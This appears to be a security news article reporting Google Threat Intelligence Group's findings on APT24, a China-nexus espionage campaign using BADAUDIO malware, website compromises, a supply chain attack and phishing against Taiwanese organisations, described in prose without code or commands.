The Google Threat Intelligence Group (GTIG) has unveiled a sophisticated three-year cyber espionage campaign orchestrated by APT24, a China-nexus threat actor, targeting organizations primarily in Taiwan through the deployment of BADAUDIO malware and strategic web compromises.
APT24’s operations have undergone a significant transformation since November 2022. Initially, the threat actor compromised over 20 legitimate public websites spanning diverse sectors from industrial concerns to recreational goods injecting malicious JavaScript payloads to deliver BADAUDIO, a highly obfuscated first-stage downloader.
This opportunistic approach has since evolved into more sophisticated tactics, including supply chain attacks and targeted phishing campaigns explicitly designed for Taiwanese organizations.
The BADAUDIO malware serves as a custom C++ downloader that establishes persistent access to victim networks. Upon execution, it downloads, decrypts, and executes AES-encrypted payloads from hard-coded command-and-control servers.
In confirmed cases, the decrypted payload was identified as Cobalt Strike Beacon, featuring a unique watermark previously observed in separate APT24 operations.
The threat actor’s initial campaign weaponized legitimate websites by injecting JavaScript that specifically excluded macOS, iOS, Android, and Internet Explorer/Edge browsers, focusing exclusively on Windows systems.
Using the FingerprintJS library, the malware generated unique browser fingerprints transmitted to attacker-controlled domains for validation.
Successful fingerprint verification triggered fabricated pop-up dialogs mimicking legitimate software updates, tricking users into downloading and executing BADAUDIO malware.
BADAUDIO typically manifests as a malicious Dynamic Link Library exploiting DLL Search Order Hijacking for execution.
Recent variants include encrypted archives containing VBS, BAT, and LNK files that automate DLL placement, establish persistence through startup entries, and trigger DLL sideloading minimizing direct indicators of compromise.
Supply Chain Compromise Amplifies Impact
In July 2024, APT24 escalated operations by compromising a regional digital marketing firm in Taiwan, affecting over 1,000 domains in a devastating supply chain attack.
The firm experienced multiple re-compromises throughout the year, demonstrating APT24’s persistent commitment.
Attackers injected malicious code into widely used JavaScript libraries, leveraging typosquatting domains to impersonate legitimate Content Delivery Networks.
During a July 2025 re-compromise, adversaries concealed highly obfuscated scripts within maliciously modified JSON files an uncommon tactic that obscured payloads in file types not typically associated with code execution.
The malware dynamically loaded legitimate jQuery and FingerprintJS2 libraries, employed advanced fingerprinting using x64hash128 browser hashes, and transmitted Base64-encoded reconnaissance data through covert POST requests to attacker endpoints.
Complementing web-based attacks, APT24 conducted highly targeted social engineering campaigns using lures such as emails purporting to be from animal rescue organizations.
The group abused legitimate cloud storage platforms including Google Drive and OneDrive to distribute encrypted archives containing BADAUDIO, though Google successfully diverted these messages to spam.
Pixel tracking links confirmed email opens and validated target interest for subsequent exploitation.
Industry Implications
GTIG has implemented comprehensive protective measures, adding all identified websites, domains, and files to Safe Browsing blocklists to protect users across major browsers.
The team conducted victim notifications with technical details to compromised sites, enabling affected organizations to secure their infrastructure and prevent future infections.
This campaign exemplifies the continued evolution of PRC-nexus threat actors employing increasingly stealthy tactics to avoid detection.
The sophisticated use of control flow flattening an obfuscation technique that dismantles natural program logic into disconnected blocks governed by central dispatchers significantly impedes both automated and manual reverse engineering efforts.
GTIG emphasizes that sharing these findings with the security community enhances threat hunting capabilities and strengthens user protections across the industry against persistent and adaptive espionage threats like APT24.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.